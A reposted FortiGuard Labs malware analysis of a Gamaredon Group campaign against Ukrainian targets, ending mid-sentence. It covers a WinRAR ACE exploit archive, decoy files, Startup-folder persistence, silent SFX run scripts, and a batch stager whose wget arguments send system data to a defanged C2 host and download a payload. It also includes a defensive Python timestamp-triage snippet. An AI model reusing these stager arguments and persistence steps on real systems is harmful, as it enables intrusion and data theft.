{"id":16137,"date":"2019-08-21T20:40:11","date_gmt":"2019-08-22T04:40:11","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2019\/08\/21\/news-9880\/"},"modified":"2019-08-21T20:40:11","modified_gmt":"2019-08-22T04:40:11","slug":"news-9880","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2019\/08\/21\/news-9880\/","title":{"rendered":"The Gamaredon Group: A TTP Profile Analysis"},"content":{"rendered":"<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12\">\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p><b><i>A FortiGuard Labs Threat Analysis<\/i><\/b><\/p>\n<p>FortiGuard Labs recently discovered a new malicious campaign run by the Gamaredon Group, possibly targeting Ukrainian law enforcement and government agencies. We decided to analyze the current campaign, focusing on the tools and methods these actors use, in order to understand their methodology and what resources are needed to launch this type of attack.<\/p>\n<p>The Gamaredon Group has been launching spear-phishing attacks against Ukrainian government and military departments since mid-2013. In one <a href=\"https:\/\/kharkivobserver.com\/ukraine-as-testing-ground-for-russian-cyber-attacks-deterrence\/\">article<\/a> published in the Kharkiv Observer \u2013 an independent Ukrainian online publication \u2013 an unnamed source stated that even the Ukrainian Presidential Administration has been attacked by malware developed by the Gamaredon Group. The anonymous cybersecurity experts cited in the article also connected the Gamaredon Group with Russian state-sponsored hackers.<\/p>\n<p>The group is very active. 
In addition to the campaign we analyze in this report, they are also <a href=\"https:\/\/www.intezer.com\/blog-evilgnome-rare-malware-spying-on-linux-desktop-users\/\">implicated<\/a> in the spreading of a new Linux malware family, EvilGnome.<\/p>\n<p>The Gamaredon Group has been active for more than 6 years, and during that time their Tactics, Techniques, and Procedures (TTPs) have mostly remained the same. They primarily target Ukrainian organizations with spear-phishing attacks, using military or similar documents as bait. Once a victim opens the bait, they deploy Remote Manipulator System (RMS) binaries via self-extracting archives and batch command files.<\/p>\n<h2>Current Campaign Analysis<\/h2>\n<p>As an example, we decided to analyze one of their latest samples. The following archive caught our attention because it exploits the path-traversal vulnerability in WinRAR\u2019s unacev2 module (the library WinRAR uses to unpack ACE archives) and because of its contents. It looked like someone was using the military conflict in Ukraine as a lure to deliver malware. A quick search for those patterns gave us the source of the archive \u2013 the Gamaredon Group.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_956427934.img.png\" alt=\"Figure 1. Files inside the archive\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 1. 
Files inside the archive<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The archive contains several decoy files:<\/p>\n<ul>\n<li>1_\u041c\u0438\u0440\u043e\u0442\u0432\u043e\u0440\u0435\u0446\u044c\u0437\u0430\u044f\u0432\u0430.jpg\n<ul>\n<li>Translation: Peacemakerstatement.jpg<\/li>\n<\/ul>\n<\/li>\n<li>2_\u041fi\u043d\u0447\u0443\u043a\u041fi\u043d\u0447\u0443\u043a \u0410\u043d\u0434\u0440i\u0439 \u042e\u0440i\u0439\u043e\u0432\u0438\u0447 27.12.1997.docx\n<ul>\n<li>Translation: PinchukPinchuk Andriy Yuriyovych 27.12.1997.docx<\/li>\n<li>Andrey Pinchuk is a Ukrainian politician with alleged ties to Russia<\/li>\n<\/ul>\n<\/li>\n<li>3_\u0425\u0430\u0432\u0447\u0435\u043d\u043a\u043e\u0425\u0430\u0432\u0447\u0435\u043d\u043a\u043e \u0414\u043c\u0438\u0442\u0440\u043e \u0412\u0430\u0441\u0438\u043bi\u0439\u043e\u0432\u0438\u0447 06.01.1966.docx\n<ul>\n<li>Translation: HavchenkoHavchenko Dmytro Vasiliyovych 06.01.1966.docx<\/li>\n<li>Dmitry Havchenko is a Ukrainian entrepreneur involved in Ukrainian politics who owns the cryptocurrency exchange WEX.<\/li>\n<\/ul>\n<\/li>\n<li>D3i_GMCWAAAq_8u.jpg<\/li>\n<li>ssu_zakon.docx\n<ul>\n<li>Translation: Security Service of Ukraine_The Law.docx<\/li>\n<\/ul>\n<\/li>\n<li>Several text files<\/li>\n<\/ul>\n<p>All of the text files contain old phone billing information, as well as coordinates, numbers, and addresses. We cannot determine whether this information is real. 
Even if it is, this kind of data can easily be found in public sources.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_1491654123.img.png\" alt=\"Figure 2. Billing data \"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 2. Billing data <\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Another file used as bait is ssu_zakon.docx. This document is just a note regarding the Security Service of Ukraine (SSU) law.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_309404618.img.png\" alt=\"Figure 3. Contents of ssu_zakon.docx\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 3. Contents of ssu_zakon.docx<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The archive also contains two MS Office documents named after the people shown on the decoy image: Pinchuk Andriy Yuryevich 27.12.1997.docx and Havchenko Dmitry Vasilyevich 06.01.1966.docx.<\/p>\n<p>The document names are written in Ukrainian, while the content is written in Russian \u2013 and is, in fact, just the translated text of the decoy image. 
The text provides brief information on two persons, listing their registered address and details of their military careers.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_80944469.img.png\" alt=\"Figure 4. Corresponding document contents\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 4. Corresponding document contents<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Checking the metadata of the three documents, we observed the following:<\/p>\n<ul>\n<li>2_\u041fi\u043d\u0447\u0443\u043a\u041fi\u043d\u0447\u0443\u043a \u0410\u043d\u0434\u0440i\u0439 \u042e\u0440i\u0439\u043e\u0432\u0438\u0447 27.12.1997.docx\n<ul>\n<li>Created: 10.04.2019 07:33:00<\/li>\n<li>Modified: 10.04.2019 07:34:00<\/li>\n<li>Created by: <b style=\"\">USER<\/b><\/li>\n<\/ul>\n<\/li>\n<li>3_\u0425\u0430\u0432\u0447\u0435\u043d\u043a\u043e\u0425\u0430\u0432\u0447\u0435\u043d\u043a\u043e \u0414\u043c\u0438\u0442\u0440\u043e \u0412\u0430\u0441\u0438\u043bi\u0439\u043e\u0432\u0438\u0447 06.01.1966.docx\n<ul>\n<li>Created: 10.04.2019 07:35:00<\/li>\n<li>Modified: 10.04.2019 07:35:00<\/li>\n<li>Created by: <b style=\"\">USER<\/b><\/li>\n<\/ul>\n<\/li>\n<li>ssu_zakon.docx\n<ul>\n<li>Created: 28.01.2019 06:42:00<\/li>\n<li>Modified: 05.04.2019 05:05:00<\/li>\n<li>Created by: <b style=\"\">USER<\/b><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>The files 1_\u041c\u0438\u0440\u043e\u0442\u0432\u043e\u0440\u0435\u0446\u044c\u0437\u0430\u044f\u0432\u0430.jpg (Peacemakerstatement.jpg) and D3i_GMCWAAAq_8u.jpg are identical. The original source of this picture is a post on a website called Mirotvorets (Peacemaker). 
The website is known for publishing the personal information of people it considers \u201cenemies of Ukraine.\u201d<\/p>\n<p>The text in the pictures below talks about Crimea, the military conflict, and two people suspected of sponsoring the presidential election campaign of the current president of Ukraine (Volodymyr Zelensky).<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_593548756.img.png\" alt=\"Figure 5. Decoy images\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 5. Decoy images<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The date printed in the image is 7 April 2019, the same day it was published on the Mirotvorets website. Interestingly, however, WinRAR shows the file\u2019s last modification date as 21.02.2019 22:03:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_306575313.img.png\" alt=\"Figure 6. File last modification time\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 6. 
File last modification time<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>A file cannot have been modified six weeks before it was published, so to understand this apparent time travel we checked the ACE archive structure.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_142038023.img.png\" alt=\"Figure 7. ACE archive structure information\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 7. ACE archive structure information<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>As figure 7 shows, each file header in the ACE archive stores its timestamp in MS-DOS date\/time format: the date (years since 1980, month, day) in the high 16 bits and the time (hour, minute, seconds divided by two) in the low 16 bits.<\/p>\n<p>If we convert 02\/21\/2019 22:03:06 to an MS-DOS timestamp, we get 0x4E55B063, which is stored as the byte sequence 63 B0 55 4E in little-endian order. Checking our archive, we find the corresponding field:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_1873269165.img.png\" alt=\"Figure 8. Timestamp hex value\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 8. 
Timestamp hex value<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Now, if we search for the byte sequence 63 B0 55 4E, we find <a href=\"https:\/\/github.com\/rapid7\/metasploit-framework\/commits\/master\/modules\/exploits\/windows\/fileformat\/winrar_ace.rb\">this<\/a> Metasploit Framework module, winrar_ace, which hardcodes the same value:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_1276104487.img.png\" alt=\"Figure 9. Same value in the Metasploit module \"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 9. Same value in the Metasploit module <\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Searching further, we found an earlier <a href=\"https:\/\/github.com\/manulqwerty\/Evil-WinRAR-Gen\/blob\/master\/evilWinRAR.py\">proof-of-concept<\/a> script, published on the 27<sup>th<\/sup> of February 2019, that uses the same constant.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_362158166.img.png\" alt=\"Figure 10. Unacev2.dll vulnerability PoC\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 10. 
Unacev2.dll vulnerability PoC<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The date stored in the archive is therefore a constant hardcoded in the generator scripts, not a real modification time. This suggests that the attackers used publicly available scripts to pack their payload. The only timestamps we can currently trust are those extracted from the MS Office document metadata: 05.04.2019 and 10.04.2019. Besides the date and time information, we also have a very generic author name: USER.<\/p>\n<h2>Exploit Analysis<\/h2>\n<p>The exploit drops three files on the file system, each with its own purpose.<\/p>\n<p>First, a shortcut called \u201cGoggle Chrome.lnk\u201d is placed on the user\u2019s desktop. As you can see in figure 11, the actor misspelled the browser name. The shortcut is meant to be clicked by the user instead of the real \u201cGoogle Chrome\u201d shortcut. It has a hardcoded path to the icon, so the proper image is shown only if the user has the browser installed.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--offset--default--4 aem-GridColumn--default--3\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_300088222.img.png\" alt=\"Figure 11. Misspelled shortcut \"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 11. Misspelled shortcut <\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Next, the same shortcut is placed in the Startup folder at %UserProfile%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Goggle Chrome.lnk. 
This time the shortcut serves persistence: everything in the Startup folder runs when the user logs in. If the desktop shortcut has not been clicked in the current session, the Startup copy is the attacker\u2019s fallback, executed at the next reboot or user login.<\/p>\n<p>Finally, the executable \u201cwin.exe\u201d is placed in the user\u2019s profile directory at %UserProfile%\\win.exe.<\/p>\n<h2>Analyzing the win.exe File<\/h2>\n<p>The file dropped to the user folder is a password-protected self-extracting RAR archive. Its PE compilation timestamp is 24.04.2017 18:45:49 (GMT).<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_1209300449.img.png\" alt=\"Figure 12. Executable file compilation timestamp\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 12. Executable file compilation timestamp<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Knowing the compilation timestamp of the SFX stub lets us identify the WinRAR version the attacker used. When an SFX archive is created, WinRAR prepends its own SFX module, so the timestamp stays close to that of the WinRAR release it shipped with. The only version that could give this timestamp is WinRAR 5.50 Beta 1 (x86): its installer is timestamped 24.04.2017 18:46:00 (GMT), 11 seconds later than the SFX stub in the malware. 
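<\/p>\n<p>Both timestamp checks above, the MS-DOS value in the ACE header (figures 7 to 9) and the PE compilation timestamp of the SFX stub (figure 12), reduce to a few lines of code. The following Python is an added example, not FortiGuard\u2019s tooling: it encodes and decodes MS-DOS timestamps, scans a blob for the constant 63 B0 55 4E that the public generator scripts hardcode, and reads TimeDateStamp from a constructed minimal PE header. The sample bytes are built inline and are not the malware; only the two timestamps come from the analysis above.<\/p>

```python
import struct
from datetime import datetime, timezone

# Modification time WinRAR displayed for the decoy image (figure 6).
ARCHIVE_MTIME = datetime(2019, 2, 21, 22, 3, 6)

# The same instant as the public generator scripts write it into the ACE header
# (figures 8 and 9): an MS-DOS timestamp stored little-endian.
PINNED_ACE_TIMESTAMP = bytes.fromhex('63b0554e')


def dos_timestamp(dt):
    '''Pack a datetime into a 32-bit MS-DOS timestamp: date in the high word, time in the low word.'''
    date = ((dt.year - 1980) << 9) | (dt.month << 5) | dt.day
    time = (dt.hour << 11) | (dt.minute << 5) | (dt.second // 2)   # DOS keeps 2-second resolution
    return (date << 16) | time


def decode_dos_timestamp(value):
    '''Unpack a 32-bit MS-DOS timestamp into a naive datetime.'''
    date, time = value >> 16, value & 0xFFFF
    return datetime(1980 + (date >> 9), (date >> 5) & 0xF, date & 0x1F,
                    time >> 11, (time >> 5) & 0x3F, (time & 0x1F) * 2)


def dos_timestamp_le(dt):
    '''The on-disk little-endian form, i.e. the byte sequence to search an archive for.'''
    return struct.pack('<I', dos_timestamp(dt))


def find_pinned_timestamp(blob, pinned=PINNED_ACE_TIMESTAMP):
    '''Offsets at which the generator-hardcoded timestamp occurs in an archive image.'''
    offsets, pos = [], blob.find(pinned)
    while pos != -1:
        offsets.append(pos)
        pos = blob.find(pinned, pos + 1)
    return offsets


def pe_compile_time(pe):
    '''Read TimeDateStamp (seconds since the Unix epoch) from the COFF header of a PE image.'''
    if pe[:2] != b'MZ':
        raise ValueError('not a PE image')
    e_lfanew = struct.unpack_from('<I', pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b'PE' + bytes(2):
        raise ValueError('bad PE signature')
    # COFF header: Machine (2), NumberOfSections (2), TimeDateStamp (4), ...
    stamp = struct.unpack_from('<I', pe, e_lfanew + 8)[0]
    return datetime.fromtimestamp(stamp, tz=timezone.utc)


# Constructed sample: a 64-byte DOS stub followed by a minimal COFF header carrying the
# timestamp reported for win.exe in figure 12. Not the malware, just the header fields.
SFX_STAMP = datetime(2017, 4, 24, 18, 45, 49, tzinfo=timezone.utc)
SAMPLE_PE = (b'MZ' + bytes(0x3C - 2) + struct.pack('<I', 0x40) +
             b'PE' + bytes(2) + struct.pack('<HHI', 0x14C, 1, int(SFX_STAMP.timestamp())))


if __name__ == '__main__':
    print(hex(dos_timestamp(ARCHIVE_MTIME)), dos_timestamp_le(ARCHIVE_MTIME).hex())
    print(decode_dos_timestamp(0x4E55B063))
    print(find_pinned_timestamp(bytes(5) + PINNED_ACE_TIMESTAMP + bytes(3)))
    print(pe_compile_time(SAMPLE_PE))
```

<p>Scanning an ACE file for the pinned value is a cheap triage check: a genuine archive carries the real modification times of its members, while every file produced by the public generators shares this one constant. The PE reader is the same check the version fingerprinting relies on, so it can be run over any SFX stub to compare against known packer release dates.<\/p>\n<p>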
Creating a self-extracting archive with this version, we indeed got the same timestamp as the malware.<\/p>\n<p>Additionally, the malicious self-extracting archive carries a digital signature copied from a legitimate Microsoft tool, Sysinternals Autoruns. As the figure below shows, the signature fails validation, because the signed hash does not match the file it was pasted onto:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_627696450.img.png\" alt=\"Figure 13. Fake digital signature\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 13. Fake digital signature<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Moving on, to get the archive password we have to check the shortcut that launches it.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_677588385.img.png\" alt=\"Figure 14. Password inside the shortcut\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 14. Password inside the shortcut<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Once we have the password, we can inspect the contents of win.exe. 
As figure 15 shows, it contains another executable, winlog.exe, plus an embedded SFX script that runs when the archive is extracted:<\/p>\n<ul>\n<li>Setup=winlog.exe (run after extraction)<\/li>\n<li>Silent=1 (hide the start dialog)<\/li>\n<li>Overwrite=2 (skip files that already exist)<\/li>\n<\/ul><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_2040208796.img.png\" alt=\"Figure 15. Contents of \u201cwin.exe\u201d\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 15. Contents of \u201cwin.exe\u201d<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Let\u2019s unpack this file and analyze its content.<\/p>\n<p>winlog.exe is a 7-Zip SFX archive whose version resource describes it as \u201cEmail Microsoft Office Word\u201d, a product that does not exist. This time, the file is even older than the previous SFX archive: although the last modification date is 10.04.2019 13:55:42 (GMT), the compilation timestamp is 05.03.2016 12:06:17 (GMT). 
Unfortunately, none of the 7-Zip release dates or versions corresponds to this timestamp, so our previous technique did not work here.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_2130180410.img.png\" alt=\"Figure 16. Description of \u201cwinlog.exe\u201d\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 16. Description of \u201cwinlog.exe\u201d<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>This self-extracting archive contains two files and a script that runs at extraction:<\/p>\n<p style=\"margin-left: 40.0px;\">!@Install@!UTF-8!<br \/> RunProgram=&quot;hidcon:5493.cmd&quot; (run the batch file in a hidden console window after extraction)<br \/> GUIMode=&quot;2&quot; (no windows are shown)<br \/> SelfDelete=&quot;1&quot; (delete the archive after extraction)<br \/> ;!@InstallEnd@!<\/p>\n<p>To find hints of the software used to create this self-extracting archive, we opened the file in a plain text editor. 
Luckily, there was some version and copyright information.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_870421566.img.png\" alt=\"Figure 17. Copyright inside the archive\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 17. Copyright inside the archive<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Searching for the copyright string, version, and script, we found that a custom tool, Modified 7-Zip SFX module for installers, version 1.6.1 Stable build 3873, was used to create the malicious file. This tool is freely distributed on the Russian-speaking forum oszone. The custom module produces a 7-Zip SFX archive with exactly the same compilation timestamp as the malicious file.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_1356651672.img.png\" alt=\"Figure 18. Custom tool posted on the oszone forum \"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 18. 
Custom tool posted on the oszone forum <\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Next, let\u2019s analyze the files contained in the archive.<\/p>\n<p>The first is called 5532.cmd and is a command prompt (batch) file. The second is an executable called config.exe.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_1092906739.img.png\" alt=\"Figure 19. Inside the 7zip SFX archive\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 19. Inside the 7zip SFX archive<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The batch file is barely obfuscated and therefore easy to read.<\/p>\n<p>The first thing we see is the configuration: a hardcoded C2 server, a filename, and a user agent:<\/p>\n<ul>\n<li>hxxp:\/\/lisingrout.ddns[.]net<\/li>\n<li>librelogout.exe<\/li>\n<li>&quot;Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:27.0) Firefox\/27.0&quot;<\/li>\n<\/ul>\n<p>After the configuration variables comes the main routine. First, the script reads the proxy settings from the registry key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings and saves the following values:<\/p>\n<ul>\n<li>ProxyServer (proxy server address)<\/li>\n<li>ProxyUser (proxy username)<\/li>\n<li>ProxyPass (proxy password)<\/li>\n<\/ul>\n<p>Next, it reads the computer name and derives a unique ID from it. 
Once done, it runs the systeminfo utility and saves the whole output to a text file, in our case named ohJlkad.txt:<\/p>\n<ul>\n<li>systeminfo &gt; ohJlkad.txt<\/li>\n<\/ul><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_1012457418.img.png\" alt=\"Figure 20. Initial data collection code\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 20. Initial data collection code<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>After that, it waits 40 seconds using the command:<\/p>\n<ul>\n<li>timeout \/T 40<\/li>\n<\/ul>\n<p>Once the timer ends, it checks for internet connectivity by sending 14 ping requests to google.com:<\/p>\n<ul>\n<li>ping -n 14 google.com<\/li>\n<\/ul>\n<p>Once finished, it kills any running process with the filename stated in the configuration (librelogout.exe) and deletes the file.<\/p>\n<p>Finally, it calls config.exe with several arguments:<\/p>\n<ul>\n<li>--user-agent=[hardcoded UA]<\/li>\n<li>--post-data=\u201c\n<ul>\n<li>versiya=wrar<\/li>\n<li>comp=%computername%<\/li>\n<li>id=[generated from computer name]<\/li>\n<li>sysinfo=[data from ohJlkad.txt]\u201d<\/li>\n<\/ul>\n<\/li>\n<li>\u201c[C2 Server]\u201d<\/li>\n<li>-q -N \u201c[C2 Server]\u201d<\/li>\n<li>-O \u201clibrelogout.exe\u201d<\/li>\n<\/ul>\n<p>If the user connects to the internet through a proxy, it passes additional arguments to config.exe (-e is wget\u2019s switch for executing a .wgetrc-style 